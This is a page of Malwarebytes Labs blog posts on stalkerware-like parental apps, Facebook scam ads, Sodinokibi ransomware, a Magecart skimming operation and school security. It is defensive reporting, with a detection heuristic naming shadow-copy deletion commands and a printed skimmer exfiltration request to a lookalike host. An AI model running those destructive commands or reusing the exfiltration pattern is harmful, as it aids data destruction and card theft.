“Operates 100% invisibly, cannot be detected.”

This invisible capability is a clear warning sign about any monitoring app, Khoo said.

“There is no legitimate reason or need to hide surveillance if it is truly for a genuine, good faith, legal, legitimate purpose,” Khoo said. “If you have the person’s consent, you don’t need to hide. If you don’t have consent, this shouldn’t be used in the first place.”

We agree.

Any monitoring app designed to hide itself from the end-user is designed against consent.

The cybersecurity risks

The cybersecurity reputations of several parental monitoring apps are questionable, as the companies behind them have left data—including photos and videos of children—vulnerable to threat actors and hackers.

In 2017, Cisco researchers disclosed multiple vulnerabilities for the network device “Circle with Disney,” a tool meant to monitor a child’s Internet usage. The researchers found that Circle with Disney had vulnerabilities that could have let a hacker “gain various levels of access and privilege, including the ability to alter network traffic, execute arbitrary remote code, inject commands, install unsigned firmware, accept a different certificate than intended, bypass authentication, escalate privileges, reboot the device, install a persistent backdoor, overwrite files, or even completely brick the device.”

In 2018, a UK-based cybersecurity researcher found two unsecured cloud servers operated by TeenSafe. Located on the servers were tens of thousands of account details—including parents’ email addresses and children’s Apple ID email addresses, along with their device names, unique identifiers, and plaintext passwords.

ZDNet, which covered the vulnerability, wrote:

“Because the app requires that two-factor authentication is turned off, a malicious actor viewing this data only needs to use the credentials to break into the child’s account to access their personal content data.”

Also in 2018, the parental monitoring company Family Orbit—which offers an app on iOS and Android—left open cloud storage servers that contained an eye-popping 281 gigabytes of sensitive data. The vulnerable servers, identified by an online hacker, contained photographs and videos of children.

And these are just the cybersecurity flaws. That’s to say nothing of the labyrinthine network of related third parties that may work with parental monitoring apps, receiving collected data and storing it across other, potentially unsecured servers littered across the web.

Steadily, the American public has begun to understand and push back on the many ways in which their data is shared with numerous third parties, often without their express, individualized consent. If it isn’t okay for adults, is it okay for children?

The privacy risks

Parental monitoring apps can give parents a near-omniscient, unfiltered view into their children’s lives, granting them access to text messages, shared photos, web browsing activity, locations visited, and call logs. Without getting consent from a child, these surveillance capabilities represent serious invasions of privacy.

Privacy Rights Clearinghouse’s Roane compared the clandestine use of these apps to a more familiar analogue:

“Would you support breaking into your child’s diary if this was the ’80s?” Roane said. “This is extremely sensitive information.”

Multiple studies have suggested that the relationship between parents and children can be significantly altered depending on the types of surveillance pushed onto them, with the age of a child playing a significant role. As a child grows older—and as their need for privacy ties closely into their autonomy—digital monitoring can potentially hinder their trust in their parents, their self-expression, and their mental health.

A few years ago, UNICEF published a discussion paper that warned of this very problem:

“The tension between parental controls and children’s right to privacy can best be viewed through the lens of children’s evolving capacities. While parental controls may be appropriate for young children who are less able to direct and moderate their behaviour online, such controls are more difficult to justify for adolescents wishing to explore issues like sexuality, politics, and religion.”

The paper also warned that strict parental controls could impair a child’s ability to “seek outside help or advice with problems at home.”

According to the science magazine Nautilus, a one-year study of junior high students in the Netherlands showed that students who were snooped on by their parents reported “more secretive behaviors, and their parents reported knowing less about the child’s activities, friends, and whereabouts, compared to other parents.”

Laurence Steinberg, a professor of psychology at Temple University, told Nautilus that when parents invade their children’s privacy, those children could be more at risk of suffering from depression, anxiety, and withdrawal. He told the outlet:

“There’s a lot of research indicating that kids who grow up with overly intrusive parents are more susceptible to those mental health problems, partly because they undermine the child’s confidence in their abilities to function independently.”

Further, in the 2012 report, “Surveillance Technologies and Children,” the Office of the Privacy Commissioner of Canada suggested that parents who rely on surveillance to keep their children safe risk stunting the maturity of those children.

Tonya Rooney, a researcher in child development and relationships at the Australian Catholic University, said in the report:  

“We need to question whether the technologies may be depriving children of the opportunity to develop confidence and competence in skills that would in turn leave them in a stronger position to assess and manage risks across a broad range of life experiences.” 

Unfortunately, this field of study is relatively new. As the children subject to parental monitoring apps reach adulthood, more can be measured, including whether those children will accept other forms of surveillance—like from domestic partners and governments.

If you’re looking for a pithy takeaway, maybe read Gizmodo’s article about a University of Central Florida study of teen monitoring apps: “Teen Monitoring Apps Don’t Work and Just Make Teens Hate Their Parents, Study Finds.”

Tough, necessary conversations

We understand that telling readers about the never-ending downsides of parental monitoring apps fails to address the likely reality that many parents have engaged in some type of digital monitoring in a safe, healthy, and openly-communicated way.

For those who have found safe passage, well done. For those who have not, the researchers we spoke to all agreed on one priority: If you absolutely insist on using one of these apps, you should discuss it with your children.

“You can openly say [to a child] ‘I am going to start looking at your location because we’re concerned and this is how we’re going to do it,’” said Freed of the IPV tech lab at Cornell. “In terms of the child’s privacy, have a conversation on the concerns and why you’re doing it, what the app you’re putting on their phone will do, what information you’ll know.”

Freed continued:

“Work through it together.”

Freed also suggested that parents could introduce only one type of digital monitoring at a time. For each additional capability—location tracking, social media monitoring, browser activity monitoring—Freed said parents should have a new conversation.

Parents that are curious about a parental monitoring app’s capabilities—including whether that app could violate privacy—should read the description available online through the App Store or the Google Play Store, said Sam Havron, another researcher and PhD student at the IPV tech lab.

“The best thing, or the closest thing, is to look at the developers’ descriptions on the marketplaces, look at the permission levels,” Havron said. He said parents could also download the app and try it out on a separate device before utilizing it on a child’s device.

Ellen Zavian, the parent of a 13-year-old boy and a member of the Tech and Safety Subcommittee for the Montgomery County Council of Parent-Teacher Associations in Maryland, suggested that parents look at the issue differently: Don’t focus so much on device software, focus on the device.

Instead of installing a screen-time-limiting app on a child’s device, or limiting what they see, or what apps they can use, remove the device entirely from the child’s room and don’t let them use it at night when they go to bed, Zavian said. Or maybe don’t let them own a device at all, which Zavian has pledged to do until her son starts eighth grade—a movement popular with parents called Wait Until 8th.

She also suggested only giving a child a Wi-Fi enabled device with no data plan, and then unplugging the home router to stop any Internet activity. Or parents could even prevent a child’s device from connecting to the home Internet, a setup that can be configured on most modern routers.
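Where the home router runs a Linux-based firmware (OpenWrt, for example), that kind of per-device block can be sketched as a firewall rule keyed to the child's device. This is an illustrative configuration fragment only; the MAC address is a placeholder, and the exact interface for doing this varies by router:

```shell
# Hypothetical sketch for a Linux-based router (e.g., OpenWrt).
# The MAC address below is a placeholder for the child's device.

# Drop all forwarded traffic from that device so it cannot reach the Internet:
iptables -A FORWARD -m mac --mac-source 00:11:22:33:44:55 -j DROP

# Remove the rule again when Internet access should be restored:
iptables -D FORWARD -m mac --mac-source 00:11:22:33:44:55 -j DROP
```

On consumer routers, the same effect is usually available through the admin interface, often under names like "access control" or "parental controls."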

Zavian pressed on her point, making a comparison to another stressful moment in parenting—letting teenagers drive. She said there’s a difference between monitoring a teenager’s driving through apps and monitoring the teenager’s access to the car itself.

“When my friends were monitoring their kids with where they were driving to, my kids just wouldn’t have keys to the car,” Zavian said. “Why do you want to engage in that fight—you’ve got enough fights when they’re teenagers—where you say ‘I saw you went here,’ or ‘I saw you were speeding here.’”

Zavian suggested that parents remember there are always alternatives to using a parental monitoring app. In fact, those alternatives have existed for far longer, and she learned about them herself when learning to drive.

“Just like we did—you get into a car accident, you’re off the insurance,” Zavian said.

The post Parental monitoring apps: How do they differ from stalkerware? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Facebook ad reporting tool launches in UK

Malwarebytes - Fri, 07/19/2019 - 15:00

Last year, well-known consumer advice expert Martin Lewis decided to take Facebook to court for defamation. The cause? Multiple bogus adverts placed on the social network featuring his likeness, appearing via the ad network Outbrain.

Because Lewis is a trusted face in consumer causes, scammers bolting his likeness onto rogue ads would always be a money spinner. This would, of course, have the knock-on effect of potentially damaging his reputation, especially with tales of victims losing as much as £100,000.

By the time he’d seen around 50 advertisements promoting various Bitcoin scams, enough was enough—especially as he felt reporting the ads got him nowhere.

Making bogus ads for fun and profit

Regular readers will no doubt be familiar with these types of bogus ads hawking swiped images of trusted individuals. It’s essentially the same as we saw a while back on compromised profile pages, all promoting some wonderful new money-making scheme courtesy of Ellen. However you stack it up, people are out of pocket.

In Lewis’ case, some of the ads looked like they were from British newspapers, or other established news sources. Many offered up the usual social engineering tactic of a ticking timer: “Get this offer soon before it runs out!” Work-from-home riches, revolutionary opportunities, making huge amounts from “small” investments—every sleazy claim you could imagine was present and accounted for, all situated next to or above Lewis looking enthusiastic (and talking about something utterly unrelated).

Facebook banned crypto-themed ads, but these Lewis-themed efforts simply replaced pictures of Bitcoin with pictures of him and sent them to cryptocurrency sites elsewhere. The Lewis ads in question were centered on incredibly dubious binary trading scams.

What is binary trading?

It’s a risky form of fixed-odds betting. You either win or you lose. Win, and you get a bump in your coffers. Lose, and you lose everything. Binary options are not allowed in the EU, which means scammers set up shop outside its borders, claim to have a base of operations in places like London and Paris, and set to work with slick, convincing adverts. As the FCA advice notes, some scammers will even manipulate the numbers in front of potential victims before swiping all the cash and vanishing into the night.

So it is into this maelstrom of potentially damaged reputations, bogus adverts, and incredibly devastating fake Bitcoin scams that Lewis and Facebook went into battle. With what he felt was a lack of responsiveness over the course of a year, off he went to try and get something done about it.

Closing time for bad ads?

In January 2019, Lewis agreed to settle out of court. By this point, Facebook had admitted there’d been “thousands” of these ads across the site. The legal settlement relied on the conditions that Facebook would donate £3 million to Citizens Advice to create a UK Scams Action Project, and that it would also launch a UK-centric scam ad reporting tool complete with a dedicated team. The donation would take the form of £2.5 million in cash over two years, with the other £500,000 covering Facebook ads, presumably promoting the new services.

We have lift-off

A little later than previously advertised, the wheels have finally turned and the promises listed above have become tangible reality. Not only is the Scams Action page live, the rogue ad report tool is also active in the UK. Reporting an ad takes a few steps, but it is clearly an improvement on no tool at all: click the dots above any ad and select the appropriate options before sending.

There’s never been a better time to start reporting bogus ads on Facebook. If you see something that looks suspicious, by all means file a report and do your bit to help keep the most vulnerable online away from potentially life-ruining scams.

The post New Facebook ad reporting tool launches in UK appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void

Malwarebytes - Thu, 07/18/2019 - 17:58

Sodinokibi ransomware, also known as Sodin and REvil, is hardly three months old, yet it has quickly become a topic of discussion among cybersecurity professionals because of its apparent connection with the infamous-but-now-defunct GandCrab ransomware.

Detected by Malwarebytes as Ransom.Sodinokibi, Sodinokibi is ransomware-as-a-service (RaaS), just as GandCrab was, though researchers believe it to be more advanced than its predecessor. We’ve watched this threat target businesses and consumers equally since the beginning of May, with a spike for businesses at the start of June and elevated consumer detections in both mid-June and mid-July. Based on our telemetry, Sodinokibi has been on the rise since GandCrab’s exit at the end of May.

Business and consumer detection trends for Sodin/REvil from May 2019 until present

On May 31, the threat actors behind GandCrab formally announced their retirement, detailing their plan to cease selling and advertising GandCrab in a dark web forum post.

“We are leaving for a well-deserved retirement,” a GandCrab RaaS administrator announced. (Courtesy of security researcher Damian on Twitter)

While many may have heaved sighs of relief at GandCrab’s “passing,” some expressed skepticism over whether the team would truly put their successful money-making scheme behind them. What followed was bleak anticipation of another ransomware operation—or a re-emergence of the group peddling new wares—taking over to fill the hole GandCrab left behind.

Enter Sodinokibi

Putting a new spin on an old product is not unheard of in legitimate business circles. Often, spinning involves creating a new name for the product, tweaking some of its existing features, and finding new influencers—“affiliates” in the case of RaaS operations—to use (and market) the product. In addition, threat actors would initially limit the new product’s availability and follow with a brand-new marketing campaign—all without touching the underlying product. In hindsight, it seems the GandCrab team has taken this route.

A month before the GandCrab retirement announcement, Cisco Talos researchers released information about their discovery of Sodinokibi. Attackers manually infected the target server after exploiting a zero-day vulnerability in its Oracle WebLogic application.

To date, six versions of Sodinokibi have been seen in the wild.

Sodinokibi versions, from the earliest (v1.0a), which was discovered on April 23, to the latest (v1.3), which was discovered on July 8

Sodinokibi infection vectors

Like GandCrab, the Sodinokibi ransomware follows an affiliate revenue system, which allows other cybercriminals to spread it through several vectors. Their attack methods include:

  • Active exploitation of a vulnerability in Oracle WebLogic, officially named CVE-2019-2725
  • Malicious spam or phishing campaigns with links or attachments
  • Malvertising campaigns that lead to the RIG exploit kit, an avenue that GandCrab used before
  • Compromised or infiltrated managed service providers (MSPs), which are third-party companies that remotely manage the IT infrastructure and/or end-user systems of other companies, used to push the ransomware en masse. This is done by accessing networks via remote desktop protocol (RDP) and then using the MSP console to deploy the ransomware.

Although affiliates used these tactics to push GandCrab, too, many cybercriminals—nation-state actors included—have done the same to push their own malware campaigns.

Symptoms of Sodinokibi infection

Systems infected with Sodinokibi ransomware show the following symptoms:

Changed desktop wallpaper. Like any other ransomware, Sodinokibi changes the desktop wallpaper of affected systems into a notice, informing users that their files have been encrypted. The wallpaper has a blue background, as you can partially see from the screenshot above, with the text:

All of your files are encrypted!
Find {5-8 alpha-numeric characters}-readme.txt and follow instructions

Presence of ransomware note. The {5-8 alpha-numeric characters}-readme.txt file it’s referring to is the ransom note that comes with every ransomware attack. In Sodinokibi’s case, it looks like this:

The note contains instructions on how affected users can go about paying the ransom and how the decryption process works.

Screenshot of the TOR-only accessible website Sodinokibi victims were told to visit to make their payments

Encrypted files with a 5–8 character extension name. Sodinokibi encrypts certain files on local drives with the Salsa20 encryption algorithm, with each file renamed to include a pre-generated, pseudo-random alpha-numeric extension that’s five to eight characters long.

The extension name and character string included in the ransom note file name are the same. For example, if Sodinokibi has encrypted an image file and renamed it to paris2017.r4nd01, its corresponding ransom note will have the file name r4nd01-readme.txt.
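This naming convention can be sketched in a few lines of Python. To be clear, this is an illustration of the observed pattern only—the character set and pseudo-random generator below are our assumptions, not Sodinokibi’s actual code:

```python
import random
import string

def make_extension(rng: random.Random) -> str:
    """Generate a pseudo-random 5-8 character alpha-numeric extension,
    mimicking the pattern seen on files encrypted by Sodinokibi."""
    length = rng.randint(5, 8)
    alphabet = string.ascii_lowercase + string.digits
    return "".join(rng.choice(alphabet) for _ in range(length))

rng = random.Random(0)  # seeded only so this sketch is reproducible
ext = make_extension(rng)

encrypted_name = f"paris2017.{ext}"   # e.g. paris2017.r4nd01
note_name = f"{ext}-readme.txt"       # ransom note shares the same string

print(encrypted_name, note_name)
```

Note how the same random string appears both as the file extension and in the ransom note’s file name, which is how victims (and analysts) can pair encrypted files with their corresponding note.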

Sodinokibi looks for files that are mostly media- and programming-related, with the following extensions to encrypt:

  • .jpg
  • .jpeg
  • .raw
  • .tif
  • .png
  • .bmp
  • .3dm
  • .max
  • .accdb
  • .db
  • .mdb
  • .dwg
  • .dxf
  • .cpp
  • .cs
  • .h
  • .php
  • .asp
  • .rb
  • .java
  • .aaf
  • .aep
  • .aepx
  • .plb
  • .prel
  • .aet
  • .ppj
  • .gif
  • .psd

Deleted shadow copy backups and disabled Windows Startup Repair tool. Shadow copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) and Startup Repair are technologies inherent in the Windows OS. The former is “a snapshot of a volume that duplicates all of the data that is held on that volume at one well-defined instant in time,” according to Windows Dev Center. The latter is a recovery tool used to troubleshoot certain Windows problems.

Deleting shadow copies prevents users from restoring from backup when they find their files are encrypted by ransomware. Disabling the Startup Repair tool prevents users from attempting to fix system errors that may have been caused by a ransomware infection.
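The exact command lines Sodinokibi runs aren’t reproduced here, but shadow copy deletion and recovery tampering are most commonly achieved across ransomware families with well-known `vssadmin` and `bcdedit` invocations. A minimal Python sketch of a log-hunting heuristic that flags those patterns (a starting point for threat hunting, not a production detection rule):

```python
def is_suspicious(cmdline: str) -> bool:
    """Rough heuristic: flag command lines matching destructive patterns
    commonly used by ransomware, e.g.
      vssadmin.exe delete shadows /all /quiet          (wipes shadow copies)
      bcdedit.exe /set {default} recoveryenabled no    (disables Startup Repair)
    """
    lowered = cmdline.lower()
    wipes_shadows = ("vssadmin" in lowered and "delete" in lowered
                     and "shadows" in lowered)
    kills_recovery = "bcdedit" in lowered and "recoveryenabled" in lowered
    return wipes_shadows or kills_recovery

# Example: scan process-creation events exported from your SIEM.
print(is_suspicious("vssadmin.exe Delete Shadows /All /Quiet"))  # → True
print(is_suspicious("notepad.exe C:\\notes.txt"))                # → False
```

Legitimate administrators rarely run these commands, so even a simple match like this tends to have a low false-positive rate on endpoint telemetry.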

Other tricks up Sodinokibi’s sleeve

Ransomware doesn’t normally take advantage of zero-day vulnerabilities in its attacks—but Sodinokibi is not your average ransomware. It takes advantage of an elevation of privilege zero-day vulnerability in the Win32k component of Windows.

Designated as CVE-2018-8453, this flaw can grant Sodinokibi administrator access to the endpoints it infects. This means that it can conduct the same tasks as administrators on systems, such as disabling security software and other features that were meant to protect the system from malware.

CVE-2018-8453 was the same vulnerability that the FruityArmor APT exploited in its malware campaign last year.

New variants of Sodinokibi have also been found to use “Heaven’s Gate,” an old evasion technique used to execute 64-bit code on a 32-bit process, which allows malware to run without getting detected. We touched on this technique in early 2018 when we dissected an interesting cryptominer we captured in the wild.

Protect your system from Sodinokibi

Malwarebytes tracks Sodinokibi campaigns and protects premium consumer and business users with signature-less detection, nipping the attack in the bud before the infection chain even begins. Users of our free version, which lacks real-time protection, are not proactively protected from this threat.

We recommend consumers take the following actions if they are not premium Malwarebytes customers:

  • Create secure backups of your data, either on an external drive or in the cloud. Be sure to detach your external drive from your computer once you’ve saved all your information, as it, too, could be infected if still connected.
  • Run updates on all your systems and software, patching for any vulnerabilities.
  • Be aware of suspicious emails, especially those that contain links or attachments. Read up on how to detect phishing attempts both on your computer and your mobile devices.

To mitigate on the business side, we also recommend IT administrators do the following:

  • Deny public IPs access to RDP port 3389.
  • Replace your company’s ConnectWise ManagedITSync integration plug-in with the latest version before reconnecting your VSA server to the Internet.
  • Block SMB port 445. In fact, it’s sound security practice to block all unused ports.
  • Apply the latest Microsoft update packages.
  • In this vein, make sure all software on endpoints is up-to-date.
  • Limit the use of system administration tools to IT personnel and only those employees who need access.
  • Disable macros on Microsoft Office products.
  • Regularly inform employees about threats that might be geared toward the organization’s industry or the company itself with reminders on how to handle suspicious emails, such as avoiding clicking on links or opening attachments if they’re not sure of the source.
  • Apply attachment filtering to email messages.
  • Regularly create multiple backups of data, preferably to devices that aren’t connected to the Internet.
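As a quick sanity check on the port recommendations above, a small TCP connect test can confirm whether RDP (3389) and SMB (445) are reachable from a given vantage point. This is a sketch for spot-checking hosts you own, not a substitute for a proper firewall audit; the localhost target below is just an example:

```python
import socket

def port_is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Connection refused, timed out, or filtered: treat as not reachable.
        return False

# Example: verify RDP and SMB exposure on a host you administer.
for port in (3389, 445):
    status = "OPEN" if port_is_open("127.0.0.1", port) else "closed/filtered"
    print(f"port {port}: {status}")
```

Running the check from outside the network perimeter (rather than from the host itself) gives the most meaningful answer about what an Internet-based attacker can reach.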

Indicators of compromise (IOCs)

File hashes:

  • e713658b666ff04c9863ebecb458f174
  • bf9359046c4f5c24de0a9de28bbabd14
  • 177a571d7c6a6e4592c60a78b574fe0e

Stay safe, everyone!

The post Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void appeared first on Malwarebytes Labs.

Categories: Techie Feeds

No man’s land: How a Magecart group is running a web skimming operation from a war zone

Malwarebytes - Thu, 07/18/2019 - 15:00

Our Threat Intelligence team has been monitoring the activities of a number of threat actors involved in the theft of credit card data. Often referred to under the Magecart moniker, these groups use simple pieces of JavaScript code (skimmers) typically injected into compromised e-commerce websites to steal data typed by unaware shoppers as they make their purchase.

During the course of an investigation into one campaign, we noticed the threat actors had taken some additional precautions to avoid disruption or takedowns. As such, we decided to have a deeper look into the bulletproof techniques and services offered by their hosting company.

What we found is an ideal breeding ground where criminals can operate with total impunity from law enforcement or actions from the security community.

The setup

Using servers hosted in battle-scarred Luhansk (also known as Lugansk), Ukraine, Magecart operators are able to operate outside the long arm of the law to conduct their web-skimming business, collecting a slew of information in addition to credit card details before it is all sent to “exfiltration gates.” Those web servers are set up to receive the stolen data so that the cards can be processed and eventually resold in underground forums.

We will take you through analysis of the skimmer, exfiltration gate, and hosting servers to show how this Magecart group operates, and which measures we are taking to protect our customers.

Skimmer analysis

The skimmer is injected into compromised Magento sites and tries to pass itself off as Google Analytics (google-anaiytic[.]com), a domain previously associated with the VisionDirect data breach.

Each hacked online store has its own skimmer located in a specific directory named after the site’s domain name. We also discovered a tar.gz archive, perhaps left behind by mistake, containing the usernames and passwords needed to log into hundreds of Magento sites. These are the same sites that have been injected with this skimmer.

Looking for additional OSINT, we were able to find a PHP backdoor that we believe is being used on those hacked sites. It includes several additional shell scripts and perhaps skimmers as well (snif1.txt):

In the next step of our analysis, we will be looking at the exfiltration gate used to send the stolen data back to the criminals. This is an essential part that defines every skimmer and can help us better understand their backend infrastructure.

Exfiltration gate

A closer look at the skimmer code reveals the exfiltration gate (google.ssl.lnfo[.]cc), which is another Google lookalike.

The stolen data is Base64 encoded and sent to the exfiltration server via a GET request that looks like this:

GET /fonts.googleapis/savePing/?hash=udHJ5IjoiVVMiLCJsb2dpbjpndWVzdCXN0Iiw{trimmed}
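An analyst who captures such a request can usually recover the plaintext by Base64-decoding the hash parameter. Here is a sketch using a synthetic payload—the field names and JSON layout are illustrative, not the skimmer’s exact format:

```python
import base64
import json

# Synthetic example of what a skimmer might encode before exfiltration.
# Field names here are illustrative only.
stolen = {"country": "US", "login": "guest", "cc_number": "4111111111111111"}
payload = base64.b64encode(json.dumps(stolen).encode()).decode()

# Analyst side: decode the captured hash parameter back to clear text.
# Base64 strings sometimes arrive with the trailing padding stripped
# (e.g. trimmed in logs), so restore it before decoding.
padded = payload + "=" * (-len(payload) % 4)
recovered = json.loads(base64.b64decode(padded))

print(recovered["country"])  # → US
```

Real captures are often trimmed or URL-encoded, so stripping the query prefix and fixing the padding, as above, is typically the first step before the JSON becomes readable.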

The crooks will receive the data as a JSON file where each field contains the victim’s personal information in clear text:

The primary target here is the credit card information that can be immediately monetized. However, as seen above, skimmers can also collect much more data. Unlike a credit card, which can simply be replaced, leaked names, addresses, phone numbers, and emails are much more problematic to deal with: they are extremely valuable data points for identity theft or spear phishing attacks.

Panel and bulletproof hosting

A closer look at the exfiltration gate reveals the login panel for this skimmer kit. It’s worth noting that both google.ssl.lnfo[.]cc and lnfo[.]cc redirect to the same login page.

lnfo[.]cc uses name services provided by 1984 Hosting, an Iceland-based hosting provider whose legitimate reputation the threat actors are likely taking advantage of.

The corresponding hosting server (176.119.1[.]92) is located in Luhansk (also known as Lugansk), Ukraine.

A little bit of research on this city shows it is the capital of the unrecognized Luhansk People’s Republic (LPR), which declared its independence from Ukraine following the 2014 revolution ignited by the conflict between pro-European and pro-Russian supporters. It is part of a region also known as Donbass that has been the theater for an intense and ongoing war that has cost thousands of lives.

Amid this chaos, opportunists are offering up bulletproof hosting services for “grey projects” safe from the reach of European and American law enforcement. This is the case of bproof[.]host at 176.119.1[.]89, which advertises bulletproof IT services with VPS and dedicated servers in a private data center.

A host ripe with malware, skimmers, phishing domains

Choosing the ASN AS58271 “FOP Gubina Lubov Petrivna” located in Luhansk is no coincidence for the Magecart group behind this skimmer. In fact, on the same ASN at 176.119.1[.]70 is also another skimmer (xn--google-analytcs-xpb[.]com) using an internationalized domain name (IDN) that ties back to that same exfiltration gate.

In addition, that ASN is a hotspot for IDN-based phishing, in particular around cryptocurrency assets:

Bulletproof hosting services have long been a staple of cybercrime. For instance, the infamous Russian Business Network (RBN) ran a variety of malicious activities for a number of years.

Due to the very nature of such hosts, takedown operations are difficult. It’s not simply a case of a provider turning a blind eye to shady operations; rather, those operations are the core of their business model.

To protect our users against these threats, we are blocking all the domains and IP addresses we can find associated with skimmers and malware in general. We are also reporting the compromised Magento stores to their respective registrars/hosts.

Indicators of Compromise

Skimmers (hosts)
google-anaiytic[.]com (176.119.1[.]72)
xn--google-analytcs-xpb[.]com (176.119.1[.]70)

Skimmers (exfiltration gate/panel)
google.ssl.lnfo[.]cc (176.119.1[.]92)

Skimmers (JavaScript)

The post No man’s land: How a Magecart group is running a web skimming operation from a war zone appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Compromising vital infrastructure: problems in education security continue

Malwarebytes - Wed, 07/17/2019 - 14:17

The educational system and many of its elements are targets for cybercriminals on a regular basis. While education is a fundamental human right recognized by the United Nations, the financial means of many schools and other entities in the global educational system are often limited.

These limited budgets often result in weak or less-than-adequate protection against cyberthreats. Unfortunately, organizations in this industry are forced to economize and cut the costs of security.

Record keepers

Schools by nature have a lot of personal data on record—not only about their students, but in most cases, they also have records of the parents, legal guardians, and other caretakers of the children they educate. And the nature of the data—grades, health information, and social security numbers, for example—makes them extremely valuable for phishing and other social engineering attacks.

Ransomware can also have a devastating effect on educational institutions, as some of the information, like grades for example, may not be recorded anywhere else. If they are destroyed or held for ransom without the availability of backups, the results can be disastrous.

Special circumstances

Organizations in the education industry have some special circumstances to deal with when trying to protect their data and networks:

  • Many schools use special software that allows their students to log in both on premise and remotely so they can view their grades and homework assignments. These applications occasionally get hacked by students.
  • Growing networks enlarge the attack surface. Modern education requires children of young ages to learn computer skills, so many students are connected to the institution’s network at once.
  • If a tech-savvy student wants a day off, claims that he couldn’t access his homework assignments, or simply wants to brag, what’s to stop him from organizing or paying for a DDoS attack? Kids will be kids.
  • Schools often also harbor a mix of IoT and BYOD devices, which each come with their own potential problems. Some schools have noticed a spike in malware detections after holiday breaks, when infected devices get introduced back into the school environment.

The sensitive nature of the data and having an open platform for students at the same time creates a difficult situation for many educational institutions. After all, it is easy to kick in a door that is already half open—especially if there is a wealth of personally identifiable information (PII) behind it.

The current situation

An analysis in December 2018 by SecurityScorecard ranked education as the worst in cybersecurity of 17 major industries. According to the study, the main areas of cybersecurity weaknesses in education are application security, endpoint security, patching cadence, and network security.

In our 2019 State of Malware report, we found education to be consistently in the top 10 industries targeted by cybercriminals. Looking only at Trojans and more sophisticated ransomware attacks, schools were even higher on the list, ranking as number one and number two, respectively.

So, it shouldn’t come as a surprise that, according to a 2016 study entitled The Rising Face of Cyber Crime: Ransomware, 13 percent of education organizations fall victim to ransomware attacks.

Malware strikes hard

Like many other organizations, educational institutions are under attack by the most active malware families, such as Emotet, TrickBot, and Ryuk, which wreaked havoc on organizations for the better part of the 2018–2019 school year.

Last May, the Coventry school district in Ohio had to send home its 2,000 students and close its doors for the duration of one day. The cause was probably a TrickBot infection, but the FBI is still busy with an ongoing investigation.

In February 2019, the Sylvan Union School District in California discovered a malware attack that made staff and teachers lose their connection to cloud-based data, networks, and educational platforms. Reportedly, they had to spend US$475,700 to clean up their networks.

On May 13, 2019, attackers infected the computer network of Oklahoma City Public Schools with ransomware, forcing the school district to shut down its network.

But it’s not just malware that educational institutions need to worry about. Scott County Schools in Kentucky paid US$3.7 million out to a phishing scam that posed as one of their vendors.

Unfortunately, that’s money many school districts, especially those in impoverished communities, cannot afford to pay out. So what can they do to get ahead of malware attacks before valuable data and funding fly out the bus window?

Recommended reading: What K–12 schools need to shore up cybersecurity

Countermeasures

Given the complex situation and sensitive data most educational organizations have to deal with, there are a host of measures that should be taken to lower the risk of a costly incident. Recognizing that many schools must divert public funding to core curriculum, our recommendations represent a baseline level of protection districts should strive toward with limited resources.

  • Separate educational and organizational networks, with grades and curriculum in one place, and personal data in another. By using this infrastructure, it will be harder for cybercriminals to access personal data by using leaked or breached student and teacher accounts.
  • DDoS protection. DDoS attacks are so cheap ($10/hour) nowadays that anyone with a grudge can have an unprotected server taken down for a few days without spending a fortune. The possible scope of DDoS attacks has increased significantly now that attackers have started using Memcached-enabled servers. To put a stop to outrageously large DDoS attacks, those servers should not be Internet-facing.
  • Educate staff and students about the dangers they are facing and the possible consequences of not paying enough attention. Teachers can incorporate cybersecurity education into reading comprehension lessons, and staff could benefit from awareness training during professional development days.
  • Lay out clear and concise regulations for the use of devices that belong to the organization and the way private devices are allowed to be used on the grounds.
  • Backups should be up-to-date and easy to deploy. Ransomware demands are high and even when you pay them, there is always the chance the decryption may fail—or never existed in the first place.
  • Investing in layered protection may seem costly, but compared to falling victim to malware or fraud, the investment is worth it.

In fact, all of these measures will cost money, and we realize that money will need to come out of a tight budget. But funding, or the lack thereof, cannot be an excuse for weak security. Cybercrime is now a sizable chunk of the modern economy. And guess who’s paying for most of it? Those who didn’t invest enough in security.

What a strange paradox that one of the best weapons against cybercrime is education, but that organizations in education have the biggest problems with security. We at Malwarebytes, with the help of educational leaders, aim to change that.

Stay safe, everyone!

The post Compromising vital infrastructure: problems in education security continue appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hi, honey. It’s mom. My phone is acting funny again.

Malwarebytes - Tue, 07/16/2019 - 17:14

Whether it’s setting up access to a Netflix account on a smart TV or enabling personal email on an iPhone, some people—of all ages—have a hard time figuring out user-friendly technology. Often, though, it’s older generations that have to turn to their progeny for everything from uploading pictures to the cloud to deciding whether it’s safe to open an attachment.

Despite results from a 2018 study from the Pew Research Center, which found that there has been “significant growth in tech adoption in recent years among older generations—particularly Gen Xers and Baby Boomers,” Millennials and Gen Zs field many “how do I?” technology questions from their aging parents.

While older generations are embracing technology, such as smart phones and smart TVs, the constant need to update “can be difficult for seniors to keep up with,” according to Senior Living. “Often seniors need help from caregivers or cell phone technicians to understand new features to their devices.”

The frustration from older users over rapidly evolving new technology, updates to software, and a laundry list of security best practices to keep track of—like needing 27 different passwords—can lead to tech and security fatigue, which causes users to bury their heads in the sand instead of keeping up with it all. What’s easier, then, is calling up a younger friend or family member for help.

That’s all well and good, but do younger generations always know the right thing to do? And are they sick of serving as the family IT guy? How can disparate generations reconcile their relationship with technology and with each other while still staying safe?

My phone is acting weird

When seniors experience user challenges, they most often turn to the Internet or their families for tech support, according to the 2019 Link-Age Connect Technology Study. Nicolas Poggi, who works for a software security firm in Santiago, Chile, agreed, explaining that his 54-year-old mother is constantly reaching out with questions about her phone.

“I think the main thing that keeps coming up is the fear that everything has a virus in it,” Poggi said. “I usually get a call or a sneaky message from Mom saying, ‘Hey, I think my phone has a virus or something. It’s acting odd, can you give me a hand?'”

Sometimes the problem is one of misconfigurations. “She’s misconfigured half of her settings by accident and the other half trying to fix the initial misconfigurations,” Poggi said, adding that his greatest technology concerns for his mother are privacy and security.

